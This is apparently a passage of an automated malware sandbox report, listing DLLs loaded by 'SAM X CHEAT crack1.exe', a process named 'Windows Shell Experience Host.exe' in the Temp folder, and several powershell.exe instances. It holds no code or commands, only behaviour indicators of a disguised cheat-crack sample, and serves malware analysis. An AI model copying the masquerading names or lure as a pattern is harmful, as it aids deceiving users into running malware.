                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: wbemcomn.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: rasapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: rasman.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: rtutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: mswsock.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: iphlpapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: dhcpcsvc6.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: dhcpcsvc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: dnsapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: winnsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: rasadhlp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: fwpuclnt.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: appresolver.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: bcp47langs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: slc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: sppc.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\Windows Shell Experience Host.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: mscoree.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: apphelp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: kernel.appcore.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: version.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: uxtheme.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: wldp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: amsi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: userenv.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: profapi.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: cryptsp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: rsaenh.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: cryptbase.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: windows.storage.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: dwrite.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: textshaping.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: windowscodecs.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: textinputframework.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: coreuicomponents.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: ntmarta.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: coremessaging.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: wintypes.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: propsys.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: urlmon.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: iertutil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: srvcli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: netutils.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: ieframe.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: netapi32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: winhttp.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: wkscli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: edputil.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: secur32.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: sspicli.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: mlang.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: wininet.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: policymanager.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: msvcp110_win.dllJump to behavior
                          Source: C:\Users\user\AppData\Local\Temp\SAM X CHEAT crack1.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dll
                          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dll
